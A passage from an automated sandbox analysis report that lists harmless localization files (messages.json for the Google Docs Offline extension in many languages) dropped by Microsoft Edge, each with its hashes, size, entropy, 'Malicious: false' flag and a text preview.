SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\vi\messages.json

Download File

